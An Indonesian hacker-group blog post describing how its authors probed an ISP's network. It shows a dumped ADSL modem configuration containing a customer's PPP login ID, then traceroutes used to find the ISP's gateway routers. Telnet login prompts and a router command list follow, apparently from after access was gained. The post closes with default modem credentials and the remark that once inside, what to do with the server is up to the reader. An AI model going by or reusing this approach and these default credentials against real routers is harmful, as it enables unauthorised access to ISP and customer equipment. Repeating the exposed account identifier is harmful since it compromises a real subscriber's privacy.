modify dsl config adsl2plusauto annex adsl2plus framing-3et maxbits 15 rxstart 6 rxend 511 duallatency disable ecfdmmode ec maxdnrate 0×1ff autosraenable disable advcapability annexa adsl2 adsl2plus t1413
create atm port enable ifname atm-0 maxvc 8 oamsrc 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
create ppp security ifname default
create ppp security ifname ppp-0 login 1527050063@telkom.net passwd (saya Hidden) he he he kasihan nanti
create atm trfdesc trfindex 0
create atm vc intf ifname aal5-0 lowif atm-0 vpi 0 vci 35 a5maxproto 2
create ppp intf ifname ppp-0 mru 1492 lowif aal5-0 droute true ppoe outside usedns true
modify nat global enable
create nat rule entry ruleid 1 napt
create alg port portno 21 prot num 6 algtype ftp
create alg port portno 1701 prot num 17 algtype l2tp
create alg port portno 1723 prot num 6 algtype pptp
create alg port portno 554 prot num 6 algtype rtsp
create alg port portno 7070 prot num 6 algtype ra
create alg port portno 7648 prot num 6 algtype cuseeme
create alg port portno 1719 prot num 17 algtype h323_ras
create alg port portno 17 prot num 6 algtype h323_q931
create alg port portno 6661 prot num 6 algtype mirc
create alg port portno 6662 prot num 6 algtype mirc
create alg port portno 6663 prot num 6 algtype mirc
create alg port portno 6664 prot num 6 algtype mirc
create alg port portno 6665 prot num 6 algtype mirc
create alg port portno 6666 prot num 6 algtype mirc
create alg port portno 6667 prot num 6 algtype mirc
create alg port portno 6668 prot num 6 algtype mirc
create alg port portno 6669 prot num 6 algtype mirc
create alg port portno 161 prot num 17 algtype snmp
create alg port portno 407 prot num 17 algtype timbuktu
create alg port portno 6301 prot num 17 algtype sgicompcore
create alg port portno 1863 prot num 6 upnpaware true algtype msnmsgr
create alg port portno 389 prot num 6 algtype ldap
create alg port portno 1002 prot num 6 algtype ldap
create alg port portno 500 prot num 17 algtype ike
create alg port portno 0 prot num 50 algtype esp
create alg port portno 1503 prot num 6 upnpaware true algtype t1
create alg port portno 5060 upnpaware true algtype sip
create alg port portno 5190 prot num 6 algtype icq
create bridge port intf ifname eth-0
modify stp port info ifname eth-0 priority 0×80 pcost 100
create dhcp relay intf ifname ppp-0
create igmp intf ifname ppp-0 host
modify autodetect cfg prot ppoe eoa
modify upnp cfg nbstatus enable
modify ilmi access protocol ifname atm-0 vpi 0 vci 35 proto any
trigger ilmi
END
Dah Di atas tersebut hasil dump saya tidak bisa menunjukan bagaimana cara dump tsb karena saya takut kawan kawan yang mempunyai etika jelek merusak atau menyalah gunakan dari artikel ini..
oke sekarang kan logikanya satu line satu user jadi enngak mungkin kita masuk ke user mereka sekarang kita cobak tembus ke main routernya atau server utama Gateway mereka.
C:\>tracert www.malanghack.net
Tracing route to malanghack.net [2.67.10.157]
over a maximum of 30 hops:
1 <1>
2 69 ms 66 ms 65 ms 1.subnet125-164-96.speedy.telkom.net.id [125.164.96.1]
3 69 ms 64 ms 66 ms 33.subnet125-160-1.speedy.telkom.net.id [125.160.1.33]
4 83 ms 96 ms 87 ms dhe-2-67-8-.static.dhecyber.net.id [2.67.8
.]
5 81 ms 79 ms 79 ms dhe-2-67-10-157.static.dhecyber.net.id [2.67
.10.157]
Trace complete.
C:\>
Anda bisa lihat saya mencoba meminjam modem dan mencoba di rumah saya hasil nya kita dapat konek dengan access speedy unlimite he he he he
125.164.96.1 <<>
oke bentar saya tanyak ama kawan yang pakai speedy di warnetnya.
Hadi: gus
Hadi: ketik nang dos koyok wingi
juss_orange: hadir
juss_orange: woce
Hadi: tracert www.malanghack.net
Hadi: paste mrene
Hadi: endi cok
juss_orange: Tracing route to malanghack.net [2.67.10.157]
over a maximum of 30 hops:
1 <1>
2 <1>
3 53 ms 52 ms 53 ms 1.subnet125-164-127.speedy.telkom.net.id [125.164.127.1]
4 55 ms 52 ms 53 ms 33.subnet125-160-1.speedy.telkom.net.id [125.160.1.33]
5 521 ms 425 ms 82 ms dhe-2-67-8-.static.dhecyber.net.id [2.67.8.]
6 489 ms 838 ms 607 ms dhe-2-67-10-157.static.dhecyber.net.id [2.67.10.157]
Hadi: oke thanks
Itu hasil di warnet jadi GW warnet 125.164.127.1 <<>
sekarang kita cobak masuk ke router telkom pusat Gatewaynya
******************************************************* **
* All rights reserved (1997-04) &n bsp; *
* Without the owner’s prior written consent, *
*no decompiling or reverse-engineering shall be allowed.*
******************************************************* **
Login authentication
Password:
Note: The max number of VTY users is 5, and the current number
of VTY users on line is 1.
hehehe ITu main router dari 125.164.96.1 Gw personal sekarang kita cobak dari GW warnet apa sama ?
******************************************************* **
* All rights reserved (1997-04) &n bsp; *
* Without the owner’s prior written consent, *
*no decompiling or reverse-engineering shall be allowed.*
******************************************************* **
Login authentication
Password:
Note: The max number of VTY users is 5, and the current number
of VTY users on line is 1.
Ha ha ha ha rupanya sapa personal ama warnet
User view commands:
bootload Set bootload information
cd &n bsp; Change current directory
clock Specify the system clock
compare Compare function
copy Copy from one file to another
debugging Enable system debugging functions
delete Delete a file
dir List files on a file system
display Display current system information
downsfu Down SFU’s DASL port
fixdisk Recover lost chains in storage device
format Format the device
free Clear user terminal interface
ftp Open FTP connection
language-mode Specify the language environment
lock Lock current user terminal interface
mkdir Create a new directory
more Display the contents of a file
move Move the file
msdp-tracert MSDP traceroute to source RP
mtracert Traceroute to multicast source
net Set net switch mode
patch Patch subcommands
ping Ping function
pwd Display current working directory
quit Exit from current command view
reboot Reboot whole router.
refresh Refresh routes
rename Rename a file or directory
reset Reset operation
rmdir Remove an existing directory
save Save current configuration
schedule schedule system task
send Send information to other user terminal interface
slave Specify HA command
startup Config paramater for system to startup
super Privilege current user a specified priority level
switch Switch communication channel
system-view Enter the system view
telnet Establish one TELNET connection
terminal Set the terminal line characteristics
tftp Open TFTP connection
tracert Trace route function
undelete Recover a deleted file
undo Cancel current setting
unzip Decompress a file
upgrade Online upgrade software
xmodem Receive a file by Xmodem protocol
zip Compress a file
itu command dari xmodem mereka …..
Oke sekarang kita analisa dari di atas.
Prolink modem biasanya password default mereka login : admin pass: password atau ada merk soho Login : admin : adslroot dll
silakan tergantung kreatifitas anda he he he.
Kalau kita dah masuk server itu tergantung kita mau apakan itu hehehe
BY : Sincan2 Malanghackerlink Team
Saya di bantu ama Letjen masuk ke main router ini .
qe3
Thanks all Crew
Source = http://malanghack.net
My blog is worth $0.00.
How much is your blog worth?
